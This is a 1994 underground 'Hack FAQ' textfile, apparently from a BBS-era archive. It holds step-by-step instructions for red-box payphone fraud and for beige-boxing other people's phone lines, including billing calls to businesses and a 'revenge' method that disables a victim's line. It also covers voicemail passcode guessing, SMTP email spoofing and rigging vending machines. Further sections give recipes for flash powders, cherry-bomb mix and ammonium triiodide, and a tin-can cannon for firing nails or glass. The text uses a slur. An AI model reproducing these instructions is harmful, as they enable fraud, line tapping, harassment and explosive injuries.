home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / HackFAQ.2.07.sit / Hack FAQ / HAQ1.TXT < prev    next >
Text File  |  1994-06-14  |  36KB  |  823 lines

  1.                     Capture file opened 14-Jun-1994 05:44p
  2.  
  3.  
  4. Jun 13, 1994 19:54 from Belisarius
  5.  
  6.  
  7.  _____________
  8. /      /     /             ***     ***      ******       ******
  9.       /                     ***     ***    *********    *********
  10.      /       /               ***     ***  ***     ***  ***     ***
  11.     /       /                 ***********  ***********  ***     ***
  12.    /       /_____    ______    ***********  ***********  ***  ** ***
  13.   /       /     /   /_____/     ***     ***  ***     ***  ***   *****
  14.  /       /     /   /             ***     ***  ***     ***   ***********
  15. /       /     /   /______         ***     ***  ***     ***   *****   ***
  16.  
  17.  
  18.                           +---------------+
  19.                           |    THE HAQ    |
  20.                           | Edition  2.07 |
  21.                           |  11 JUN 1994  |
  22.                           +---------------+
  23.  
  24. ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ
  25.  
  26.                  "Knowledge is power" --Francis Bacon
  27.               "United we stand, divided we fall" --Aesop
  28.  
  29.  
  30. =+=+=+=+=+=+=+=+=+= HACK-FAQ!  Non-Copyright Notice =+=+=+=+=+=+=+=+=
  31. =                                                                   =
  32. +      MatrixMage Publications.       1994    No rights reserved.   +
  33. =                                                                   =
  34. + This file may be redistributed provided that the file and this    +
  35. = notice remain intact. This article may not under any              =
  36. + circumstances be resold or redistributed for compensation of any  +
  37. = kind.  Distribution of THE HACK-FAQ! is encouraged and promoted.  =
  38. +                                                                   +
  39. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
  40.  
  41.  
  42.                         <*>  Edited by  <*>
  43.  
  44.  
  45.                         # Editor-in-Chief #
  46.                Belisarius < temporary loss of E-mail >
  47.           can be reached on ISCA, Shadow, SkyNET, Brinta and
  48.          Baltimore 2600 Meetings and other nameless locations.
  49.  
  50.  
  51.                 # Asst.  Editor (non communicado) #
  52.                Neurophire (on Shadow and N P on ISCA)
  53.  
  54.  
  55.                 A MatrixMage Electronic Publication
  56.  
  57.  
  58. Special Thanks to the Following Contributors:
  59. Z Maestro     RA of ISCA Underground>
  60. DINO          RA of Shadow Hack and Crack>
  61. Artimage      RA of SKYNET Underground>
  62.  
  63. Faunus        Revolution        Miska               Informatik
  64. Matrixx       Amarand           Crypto Steelyhart   aBBa / PfA
  65. Beelzebub     Redbeard          Squarewave
  66. IO            CyberSorceror     Caustic
  67. Doktor Nil    Skipster          Walrus
  68. CPT Ozone     Abort             Kyoti
  69. Carsenio      Aero              Phrack
  70.  
  71.  
  72. AND NOW A WORD FROM YOUR EDITOR:
  73.  
  74.      Throughout history mankind has been afraid of the unknown.
  75. Before lightning could be scientifically explained it was blamed on
  76. the anger of the gods.  This belief in mysticism persisted throughout
  77. the ages (and still does today).  Later as man acquired simple herbal
  78. and chemical knowledge, these men were revered as mages, users of
  79. mystical arts derived from the old gods.  But as organized religion
  80. (i.e. Christianity especially Roman Catholicism) spread and came to
  81. dominate society (became the powers that be), the mage was no longer
  82. revered.  The mage (who only sought to understand the world around
  83. himself and make the world a better place) was persecuted, attacked
  84. and driven underground by the church.  But driving these mages
  85. underground (out of society) did not stop there ideas from spreading
  86. or them from continuing to work.  The church label Copernicus as a
  87. heretic and mage and only this century has the Roman Catholic church
  88. accepted his principles (heliocentric universe) as fact.
  89.      So are 'hackers' the same today.  We surf the nets seeking
  90. knowledge and information (and hopefully understanding).  Information
  91. and understanding the meaning and import of the information are the
  92. two greatest commodities and bases of power in the world today.
  93. These things are easy to disseminate and gather in the electronic
  94. world.  The matrix (cyberspace/web/net [whichever term you choose]
  95. is able to influence and control information faster and better than
  96. ever before.  This makes many afraid of the cyberculture (not to
  97. mention a deep-seated techno-fear of many people, anything new and
  98. technical is bad).
  99.      We are a new breed of mage; seeking knowledge, desiring
  100. understanding, persecuted by the powers that be.  This is why I have
  101. started this publication.  We are the MatrixMages!  Our mission is
  102. to learn and to pass on that knowledge.
  103.  
  104.                                       -=> Belisarius <=-
  105. *********************************************************************
  106. What is 'Cyberpunk' and the Underground?
  107.  
  108. "Every time I release a phile, or write an article for a zine, it's
  109. vaguely like a baby.  It gets stored, and copied, and sent out all
  110. over the world, and people read it.  It goes into their minds.
  111. Something I created is buried in living tissue and consciousness
  112. someplace.  Eventually somebody uses it, and I know that I have the
  113. power to change the world.  Somewhere, someplace, somebody changed
  114. something using information I changed or created.  I helped to
  115. change the world."  --Unknown
  116.  
  117. That is the attitude of many of the people who, knowingly or not, are
  118. members of this hyped/wired/cyber culture.  Some who may read this
  119. will see some of their undefined beliefs, hopes and feelings
  120. reflected in the above quote.  And, as the quote says, they will
  121. help spread it.  Somewhere, somehow, that quote will change the
  122. world.
  123.  
  124. But only if you work to change it.  Remember that information and
  125. knowledge a powerful commodities.  He who has information cannot
  126. be beaten.  So above all the most important thing to do in the
  127. "Underground" is to gather information.  This means that you have to
  128. work and put in some effort.  You don't get something' for nothing!
  129. So work hard and together we can change the world!
  130.  
  131. Keep up with latest editions.  (Sorry there haven't been many lately
  132. but exams and not failing out took precedence!)
  133.  
  134. The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
  135. or any contributor are not responsible for any consequences.
  136. You use this information at your own risk.
  137.  
  138. *********************************************************************
  139.                               CONTENTS
  140. *********************************************************************
  141. Sections
  142.    I. Phone Fun
  143.        (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
  144.   II. Fake E-Mail
  145.        (Fooling UUCP)
  146.  III. Social Engineering
  147.        (Free sodas, Dumpster Diving, ATMs, Carding)
  148.   IV. The Big Bang
  149.        (Making Weapons and Explosives)
  150.    V. Infection
  151.        (Virii, Trojans, Worms and other creepy crawlies)
  152.   VI. NEWBIES READ THIS
  153.        (Basic Hacking)
  154.  VII. Screwing with the most widespread operating system on the net
  155.        (UNIX / AIX Hacking)
  156. VIII. Screwing with the most secure operating system on the net
  157.        (VAX/VMS Hacking)
  158.   IX. Screwing with the most widespread operating system on PCs
  159.        (MS-DOS Hacks)
  160.    X. Finding out what that encrypted info is
  161.        (Cracking programs)
  162.   XI. How do I keep my info secure
  163.        (PGP / Cryptology)
  164.  XII. Chemistry 101
  165.        (explosive/pyrotechnic component prep)
  166. XIII. Fun things with solder, wires, and parts
  167.        (Underground electronics)
  168.  XIV. Watching television
  169.        (cable, Pay-Per-View(PPV), scrambling)
  170.   XV. Tuning in to what's on the radio waves
  171.        (Radios and Scanning)
  172.  
  173. Appendices
  174.    A. FTP sites with useful info
  175.    B. Interesting Gophers
  176.    C. Informative USENET Newsgroups
  177.    D. Publications and Zines
  178.    E. Books
  179.    F. Files and Papers
  180.    G. Cataglogs
  181.    H. PGP Keys
  182. *********************************************************************
  183.  
  184.  
  185. =====================================================================
  186. I. Phone Fun
  187.      (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
  188.  
  189. WHAT IS A RED BOX AND HOW DO I MAKE ONE?
  190. (from Doktor Nil)
  191.  
  192. First note: a redbox is merely a device which plays the tone a
  193. payphone makes when you insert money. You just play it through the
  194. mike on the handset. You would think that the Phone Co. would mute
  195. the handset until you put a quarter in, and perhaps they are starting
  196. to build phones like that, but I have yet to see one.
  197.  
  198. What you need:
  199. - Radio Shack 33 memory Pocket Tone Dialer
  200. - 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
  201.   below)
  202. - A solder gun.
  203. - Someone who can point out the crystal in the Tone
  204.   Dialer.
  205.  
  206. Instructions:
  207. 1) Open up the back of the tone dialer. Use screwdriver.
  208.  
  209. 2) Locate crystal. It should be toward the right side.
  210. It will be smaller than the 6.5 MHz one you bought, but otherwise
  211. vaguely similar.  It is basically capsule-shaped, with two electrodes
  212. coming out of the bottom which are soldered onto a circuit board.
  213. It's on the _left_ side, basically the third large crystal thing from
  214. the bottom, about 1.5 cm long, metallic, thin.
  215.  
  216. 3) De-solder, and de-attach, crystal. Heat the solder that the
  217. crystal is seated in; remove crystal.
  218.  
  219. 4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
  220. is already there from the old crystal, that way there is less chance
  221. of you dropping hot solder somewhere it shouldn't be and losing
  222. everything. Heat first one drop of solder with the solder gun, and
  223. seat one electrode of the 6.4 MHz crystal in it, then do the same
  224. with the other. This is the easiest part to mess up, be careful that
  225. both drops of solder don't run together.
  226.  
  227. 5) Put cover back on. you are done.
  228.  
  229.  
  230. How to use: Five presses of the "*" key will make the quarter sound.
  231. I think fewer presses make nickel/dime sounds, but I can't remember
  232. specifically. Here in Michigan, you can simply hold it up to the
  233. handset and press memory recall button 1 (where you have conveniently
  234. recorded five *'s -read the tone dialer directions on how to do this)
  235. and get a quarter credit, _IF_ you are calling LD. Keep making the
  236. tone to get additional credits. There is a maximum number of credits
  237. you can have at once.
  238.  
  239. To make a local call this may not work. You need to first put in a
  240. real coin, then you can use the redbox for additional credits. There
  241. may be a way around this, however: Call the operator, and ask her to
  242. dial your number for you. She should do this without asking why, it
  243. is a regular service. If you need an excuse, say the "4" key isn't
  244. working, or something. She will ask you to insert your money. At
  245. this point use the redbox. If all goes well, she dials your number
  246. and you're in business. If she says "Will you do that one more time,"
  247. or "Who is this," or any variations, hang up and walk away.
  248.  
  249. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  250.  
  251. WHAT DO THESE CRYSTALS LOOK LIKE?
  252. In most cases, a rectangular metal can with two bare wires coming out
  253. of one end, and a number like "6.50000" stamped on one side.
  254.  
  255. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  256.  
  257. WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
  258. (from Matrixx)
  259. 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
  260. is the easiest to find (Radio Shack)
  261.  
  262. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  263.  
  264. WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
  265. The crystals are available from Digi-Key.  Call 1-800-DIGIKEY
  266. (1-800-344-4539) for more info.  The part order number from
  267. DIGI-KEY is x-415-ND
  268.  
  269. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  270.  
  271. WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
  272. (from DINO)
  273. For a Radio Shack conversion red box: a nickel is one * and a quarter
  274. is 5 *'s
  275.  
  276. Here are the freqs for a red box:
  277.  
  278. $.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
  279.      with 33 millisecond pause between each pulse
  280. $.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
  281.      millisecond pauses
  282. $.05 one pulse at the above freqs for 66 milliseconds!
  283.  
  284. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  285.  
  286. HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
  287. (from Faunus, Carsenio)
  288. If it doesn't say "______ Bell" on it, it's probably a COCOT.  COCOT
  289. is a general term for Customer owned or "Bell-independent" phone
  290. companies.  Sometimes they are more shabbily constructed than real
  291. fortress phones but others look about the same except for a lack of
  292. phone company logo.
  293.  
  294. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  295.  
  296. FOOLING COCOTS USING 800 NUMBERS?
  297. You call up an 800 number as any public phone HAS too let you dial
  298. 800 numbers for free.  Then you let the person who answers the 800
  299. number hang up on you, THEN you dial your number that you want to
  300. call free.  OK MOST COCOTs disable the keypad on the phone so you
  301. CANT just dial the number, you have to use a pocket tone dialer to
  302. dial the number.
  303.  
  304. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  305.  
  306. HOW DO I MAKE A BEIGE BOX?
  307. (from Neurophyre)
  308. Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
  309.           clips, ratchet wrench, 7/16-inch hex head
  310.  
  311.  1. Cut the head off one end of the phone cord.
  312.  2. Strip the coating back about two (2) inches.
  313.  3. Look for the red wire, and the green wire.
  314.  4. Mark one clip green and put it on the green.
  315.  5. Mark the other red and put it on the red.
  316.  6. Once you have them soldered and insulated, plug the other end
  317.     (that still has the head) into a phone.
  318.  7. Go out in the daytime and look for green bases, green rectangular
  319.     things sticking about 3 feet out of the ground with a Bell logo on
  320.     the front.  If you're a lamer, you'll waste your time with a
  321.     cable company box or something.  I've heard of it.
  322.  8. Come back to a secluded one at night.  With the wrench, open it
  323.     up.
  324.  9. Find a set of terminals (look like the threaded end of bolts
  325.     in my area) with what should be a red wire and a green wire
  326.     coming off them.
  327. 10. Plug in your beige box red to red and green to green, pick up the
  328.     phone and dial away!
  329.  
  330. Modems work too as well as taps and shit.  You're using someone
  331. else's line (unless you're an idiot) to get phone service.  Don't
  332. abuse the same line after the phone bill comes.
  333.  
  334. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  335.  
  336. BEIGE BOXING 101
  337.                          Field Phreaking
  338.                            by Revolution
  339.  
  340.      At the beginning of the section in the Bell training manual
  341. entitled "One million ways to catch and fry a phreak" it doesn't
  342. have a disclaimer saying "for informational purposes only".  So why
  343. the hell should I put one here?  Give this file to whoever you want,
  344. just make sure it all stays together, same title, same byline.
  345.  
  346.      Field phreaking gives you everything you've ever wanted: free
  347. long distance calls, free teleconferencing, hi-tech revenge, anything
  348. you can do from your own phone line and more, without paying for it,
  349. or being afraid of being traced.  Just be ready to bail if you see
  350. sirens.
  351.  
  352. How to make a beige box: Easiest box to make.  Cut your phone cord
  353. before the jack, strip the wires a little.  You should see a red
  354. (ring) wire and a green (tip) wire.  If you see yellow and black
  355. wires too just ignore them.  Put one set of alligator clips on the
  356. red wire and one on the green wire, and you're set.  (You want to
  357. use your laptop computer, but you don't want to ruin your modem's
  358. phone cord?  Just unscrew a jack from a wall, unscrew the 4 screws on
  359. the back, and do the same thing as above. Now you can use a phone,
  360. laptop, anything you can plug in a jack.)
  361.  
  362. How to use: What you have is a lineman's handset.  You can use it
  363. from any bell switching apparatus (from now on sw. ap.).  These are
  364. on phone poles, where your phone line meets your house, and near
  365. payphones.  I'll go into detail below, but basically just open any
  366. box on a telephone pole, and you'll see sets of terminals (screws),
  367. with wires wrapped around them, just like on the back of a phone
  368. jack.  These screws are where you need to attach your alligator
  369. clips to get a dial tone.  Don't unscrew the screw, you'll just
  370. fuck up some poor guys line, and increase your chances of getting
  371. caught.  After the wire goes around the screw, it normally twists
  372. off into the air.  Put your clip on the end of the wire.  Do the
  373. same with the other clip.  If you don't get a dial tone, then
  374. switch terminals.
  375.  
  376. On telephone poles:
  377.  
  378. TTI terminals: These must have been built by phreaks, just for
  379. beige boxing.  By far the easiest sw. ap. use.  The only drawback
  380. is that they only connect to one phone line.  These are the fist
  381. sized gray or black boxes that appear where a single phone line
  382. meets the mother line.  They look almost like outdoor electric
  383. sockets, that have the snap up covering. They normally have the
  384. letters TTI somewhere on the front.  No bolts or screws to take
  385. off, just snap up the top and you will see four screws.  Clip in
  386. and happy phreaking.  Just click the top down and no one will ever
  387. know you were there (except for the extra digits on their phone
  388. bill.)
  389.  
  390. Green trees:  just about the hardest sw. ap. to beige from (tied
  391. with the bell canister) but if its the only one you can use, go for
  392. it.  These are the 3 foot high green/gray metal columns that are no
  393. wider than a telephone pole (which makes them different then the
  394. green bases, see below), that say "Call before digging, underground
  395. cable," or the real old ones just have a bell sign.  Usually green
  396. trees are right at the base of phone poles, or within a foot or two
  397. of them.  These normally have two 7/16 bolts on one side of the
  398. column, which have to be turned 1/8 a turn counterclockwise, and
  399. the front of the base will slide off.  Now you will see a sheet of
  400. metal with a few square holes in it, that has a bolt where the
  401. doorknob on a door would be.  Ratchet this one off and the metal
  402. sheet will swing open like a door.  On one side of the sheet will
  403. be a paper with a list of #'s this tree connects to.  Inside you'll
  404. see a mass of wires flowing from gray stalks of plastic in sets of
  405. two. The whole mass will have a black garbage bag around it, or
  406. some type of covering, but that shouldn't get in the way.  The
  407. wires come off the gray stalk, and then attach to the screws that
  408. you can beige from, somewhere near the ground at the center of the
  409. tree. These are on a little metal column, and sometimes are in a
  410. zig-zag pattern, so its hard to find the terminals that match in
  411. the right order to give you a dial tone.
  412.  
  413. Green bases: The gray/green boxes you see that look just like green
  414. trees, except they are about twice or three times as wide.  They
  415. open the same as trees, except there are always 4 bolts, and when
  416. the half slides off, inside is a big metal canister held together
  417. with like 20 bolts.  I wouldn't open it, but with a little info
  418. from friends and some social engineering, I learned that inside is
  419. where two underground phone lines are spliced together.  Also inside
  420. is either pressurized gas or gel.  Pretty messy.
  421.  
  422. Bell canisters:  attached to phone poles at waist level.  They are
  423. green (or really rusted brown) canisters about a two feet tall that
  424. have a bell insignia on the side. They will have one or two bolts
  425. at the very bottom of the canister, right above the base plate.
  426. Take the bolts off and twist the canister, and it'll slide right
  427. off.  Inside is just like a green tree, except there normally isn't
  428. the list of #'s it connects to.
  429.  
  430. Mother load: Largest sw. ap.  A large gray green box, like 6 x 4,
  431. attached to a telephone pole about three feet off the ground.  a big
  432. (foot or two diameter) cable should be coming out the top.
  433. Somewhere on it is a label "MIRROR IMAGE CABLE".  It opens like a
  434. cabinet with double doors.  Fasteners are located in the center of
  435. the box and on the upper edge in the center.  Both of these are
  436. held on with a 7/16 bolt.  Take the bolts off, and swing the doors
  437. open.  On the inside of the right door are instructions to connect
  438. a line, and on the inside of the left door are a list of #'s the
  439. box connects to.  And in the box are the terminals. Normally 1,000
  440. phones (yyy-sxxx, where yyy is your exchange and s is the first
  441. number of the suffix, and xxx are the 999 phones the box connects
  442. too).
  443.  
  444. On houses: follow the phone line to someone's house, and then down
  445. there wall.  Either it goes right into there house (then you're
  446. screwed) or it ends in a plastic box.  The newer boxes have a screw
  447. in the middle, which you can take off with your fingers, and then
  448. put the box back on when you're done, but the older ones are just
  449. plastic boxes you have to rip off.  Inside are 4 terminals, yellow,
  450. black, and red and green, the two you need.  Find the Christmas
  451. colors, and phreak out.
  452.  
  453. On payphones: follow the phone line up from the phone, and sometimes
  454. you'll find a little black box with two screws in it.  Undo this,
  455. and you'll find a nice little phone jack. You don't even need your
  456. beige box for that one.  If there's not one of those, follow the
  457. wire to a wall it goes into, and sometimes there will be a sw. ap.
  458. like those on houses (see above).  Payphones are normally pretty
  459. secure now though, and you probably won't find any of those.
  460.  
  461. Phreaky things you can do:  Jesus, do I have to tell you lamers
  462. everything? Anyway, free long distance calls should be pretty easy,
  463. and get teleconferencing info from somebody else, just make sure
  464. you ANI the # you're calling from before calling Alliance.
  465.  
  466. Hi-tech revenge!
  467. Possibilities are endless, you have total control of this lamers
  468. line.  Most of you guys are probably way to elite for this one, but
  469. you can disconnect his line by loosening a few screws and ripping
  470. his wires at any sw. ap. but here's something a lot better:  Get the
  471. faggots number, and then find the mother load sw. ap. it connects
  472. to (not the sw. ap. on his house or on the telephone pole in his
  473. drive way, the _mother_load_) Find his # in the terminals, and then
  474. connect the two terminals with a paper clip or an alligator clip! His phone
  475. will be busy until ma bell
  476. figures out what the hell is going on, and since the last place
  477. they look is the mother load, this usually is at least a week.
  478. Then, of course, is the funniest prank:  Beige box from a major
  479. store, like Toys R Us (that's my favorite) and call up ma bell
  480. "Yeah, I'd like all calls to this number forwarded to (his
  481. #)"
  482.  
  483. That's it.  Reach me as Revolution on ISCA, Cyberphunk on Shadow,
  484. phunk on IRC, or Revolution on Delphi.  Any phreaks out there who
  485. got new info, war stories or some addictive disorder and just need
  486. somebody to talk to, E-mail revolution@delphi.com no PGP needed.
  487.  
  488. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  489.  
  490. WHAT PHONE NUMBER AM I CALLING FROM?
  491. (from Skipster, et al)
  492.  
  493. This service is called ANI.
  494.  
  495. This number may not work, but try it anyway:
  496. (800) 825-6060
  497.  
  498. You might want to try is dialing 311 ... a recorded message tells you
  499. your phone #.  Experiment, but 311 does work, if it doesn't and an
  500. operator picks up, tell her that you were dialing information and
  501. your hand must have slipped.
  502.  
  503. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  504.  
  505. HOW DO I USE/DO ALLIANCE TELECONFERENCING?
  506. (from Neurophire, Carsenio)
  507. Set one of these up, it is a 1-800 dial-in conference.  Then, grab
  508. your beige box, go to some business, preferably something like a
  509. Wal-Mart or a Radio Shack and beige box off their line.  Then call
  510. and set up a teleconference for whenever to be billed to the line
  511. you are calling from.  You'll want to know specifically what to ask
  512. for. Alliance teleconferencing is 0-700-456-1000.
  513. Dial the number (you're of course paying for this by the minute)
  514. and you get automated instructions on how to choose the number of
  515. ports for your conference call, and how to dial each participant..
  516.  
  517. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  518.  
  519. WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
  520. (from Token)
  521. Just scroll through your favorite business magazine and look for
  522. 800#s.  Once you get a VMB system you can look for a box being used
  523. and try the default passcodes <0000> , <9999> , etc.  Like on the
  524. INet, most people are too dumb to change their passwd.  If you're
  525. lucky you might get the root box (I did, the stupid ass's passwd
  526. was <4321>).
  527.  
  528.  
  529. =====================================================================
  530. II. Fake E-mail
  531.      (Fooling UUCP)
  532.  
  533. HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
  534. (from Beelzebub, Doktor Nil w/ Belisarius)
  535.  
  536. 1.  Telnet to port 25 of any internet server
  537.        (eg. telnet site.name.and.address 25)
  538. 2.  If at all possible, AVOID TYPING "HELO".
  539. 3.  Type: rcpt to (person to receive fake mail){ENTER}
  540. 4.  Type: mail from (fake name and address){ENTER}
  541. 5.  The mail server should ok each time after each name.
  542. 6.  If it does not:
  543.      a) type vrfy and then the name of the person
  544.      b) as a last resort use helo, this will login your computer as
  545.         having been the source of the mail
  546. 7.  Retype the commands, it should say ok now.
  547. 8.  Type: data{ENTER}
  548. 9.  The first line of the message will be the Subject line
  549. 10.  Enter your letter
  550. 11.  To send letter type a "." on an empty line.
  551. 12. Then type quit{ENTER}
  552. 13. This is traceable by any sysadmin ... don't harass people this
  553.     way.
  554. 14. If the person receiving the mail uses a shell like elm he/she
  555.     will not see the telltale fake message warning
  556.     "Apparently-To:(name)" even if not, most people wouldn't know
  557.     what it means anyway.
  558. 15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
  559.     so as to make it look more believable and cover any add-ons the
  560.     mail routine might try
  561. 16. Put a realistic mail header in the mail message to throw people
  562.     off even more.  If there are To: and Date: lines then the
  563.     program probably won't add them on.
  564. 17. Also try to telnet to the site where the recipient has his
  565.     account.  This works better if you know how to fool it.
  566.  
  567. =====================================================================
  568. III. Social Engineering
  569.      (Free sodas, Dumpster Diving, ATMs, Carding)
  570.  
  571. WHAT DOES SALTING VENDING MACHINES DO?
  572. When you take concentrated salt water (a high concentration of salt)
  573. and squirt it into the change slot (preferably where the dollar
  574. bills come in, though some say it doesn't matter), the salt will
  575. short circuit the machine and out will pour change and hopefully
  576. sodas.
  577.  
  578. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  579.  
  580. ANOTHER WAY OF GETTING FREE SODAS?
  581. This is an easier and actually more reliable way of getting free
  582. sodas.  It only wprks pn spme machines though, usually Coca-Cola.
  583. Anyways, put in your change and as the last coin goes down the slot
  584. start rapidly and repeatedly pressing the button of your choice.
  585. If everything works well, then you should get two sodas and your
  586. change back.
  587.  
  588. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  589.  
  590. HOW ARE THE TRACKS OF ATM CARD ARRANGED?
  591.  
  592. The physical layout of the cards are standard.  The logical arrangement
  593. of the data stored on the magnetic strip varies from institution to
  594. institution.  There are some generally followed layouts, but not
  595. mandatory.
  596.  
  597. There are actually up to three tracks on a card.
  598.  
  599. Track 1:
  600. Designed for airline use.  Contains name and possibly your account
  601. number.  This is the track that is used when the ATM greets you
  602. by name.  There is alot of variation in how things are ordered so
  603. occasionally you get 'Greetings Q. John Smith' or
  604. 'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
  605. This track is also used
  606. with the new airline auto check in (PSA, American, etc).
  607.  
  608. Track 2:
  609. The main operational track for online use.  The first thing
  610. on the track is the Primary Account Number (PAN).  This is usually
  611. pretty standard for all cards.  Some additional info might be on the
  612. card such as expiration date.
  613. One interesting item is the PIN (Personal Identification Number)
  614. offset.  When an ATM verifies a PIN locally, it usually uses an
  615. encryption scheme involving the PAN and a secret KEY.  This gives you
  616. a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
  617. generated).  If you want to select your own PIN, they would put the
  618. PIN OFFSET in the clear on the card.  Just do modulo 10 arithmetic on
  619. the Natural PIN plus the offset, and you have the selected PIN.
  620. The PIN is never in the clear on your card.  Knowing the PIN OFFSET
  621. will not give you the PIN.  This will require the SECRET KEY.
  622.  
  623. Track 3:
  624. The "OFF-LINE" ATM track.  It contains information such as your daily
  625. limit, limit left, last access, account number, and expiration date.
  626. The ATM itself could have the ability to write to this track to
  627. update information.
  628.  
  629. =====================================================================
  630. IV. The Big Bang
  631.      (Making Weapons and Explosives)
  632.  
  633. FLASH POWDERS:
  634. (from Neurophyre)
  635.  
  636. Materials: Powdered magnesium, powdered potassium nitrate
  637. 1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
  638.    nitrate.
  639. 2. Light it with a long fuse cuz its so bright it might screw up your
  640.    eyes.
  641.  
  642.  REAL Cherry Bomb Powder
  643.     4 parts by weight of potassium perchlorate
  644.         1 part by weight of antimony trisulfide
  645.         1 part by weight aluminum powder
  646.  
  647.  Relatively Safe
  648.     3 parts by weight of potassium permanganate
  649.     2 parts by weight of aluminum powder
  650.  
  651.  
  652.  *VERY* Shock/Friction/Static/Heat Sensitive!
  653.  Use only if suicidal or desperate!
  654.     4 parts by weight of potassium chlorate
  655.         1 part by weight of sulfur
  656.         1 part by weight of aluminum powder
  657.  
  658. 1) To use these mixtures, SEPARATELY pulverize each ingredient into a
  659. fine powder, the finer it is, the more power you get.  Use a mortar and
  660. pestle if available, and grind GENTLY.  Do not use plastic as this can
  661. build a static charge.  Remember, do them SEPARATELY.
  662.  
  663. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  664.  
  665. AMATEUR EXPLOSIVE (Ammonium Triiodide):
  666. (from IO)
  667. WARNING:  This explosive is EXTREMELY shock sensitive when dry, and
  668. moderately sensitive when wet!!!  AVOID IT when dry!  DO NOT store!
  669. The purplish iodine vapor this produces during the explosion will stain
  670. and corrode!
  671. 1) Take a small plastic bucket, add 3-4 inches of household ammonia.
  672.    This bucket will never be clean again, in all likelihood.
  673.    Try to get clear (non-pine, non-cloudy) ammonia.  Or use an
  674.    ammonium hydroxide solution from a chemlab.  This results in better
  675.    but more sensitive, and therefore dangerous crystals.
  676. 2) Drop in iodine (like you use on scratches) one drop at a time, or,
  677.    preferably, use crystals of iodine.
  678. 3) Let it settle, then pour it through a piece of cloth, discarding
  679.    the runoff.
  680. 4) Squeeze *gently* to get out excess liquid.
  681. 5) Mold it onto the thing you want to blow up, stand **way** back.
  682. 6) Wait for it to dry, and throw a rock at it.
  683.  
  684. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  685.  
  686. HOW TO BUILD A TENNIS BALL CANNON?
  687. 1. Get six (6) tin cans.
  688. 2. From five of them remove the tops and bottoms.
  689. 3. From the last one remove only the top. (this is the last can to
  690.    make the breach)
  691. 4. The cans should overlap and be fit together to make a long barrel
  692.    closed at one end and open at the other.
  693.  
  694.                  ___________________________________
  695.     open -->    ()____)_____)_____)_____)_____)_____)    <--closed
  696.     (barrel)           1     2     3     4     5     6          (breach)
  697.  
  698. 5. Duct tape all of the cans together.  USE LOTS OF TAPE!!
  699. 6. Put some gunpowder in the bottom of the CANnon.
  700. 7. Aim, brace the CANnon.
  701. 8. Spray hairspray or pour alcohol on the tennis ball and light.
  702. 9. Drop the ball into the can and STAND BACK!
  703.  
  704. Other ideas:
  705. a) Make explosive tennis balls.
  706. b) Launch potatoes.
  707. c) Launch thumbtacks, nails, broken glass, etc.
  708.  
  709. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  710.  
  711. HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
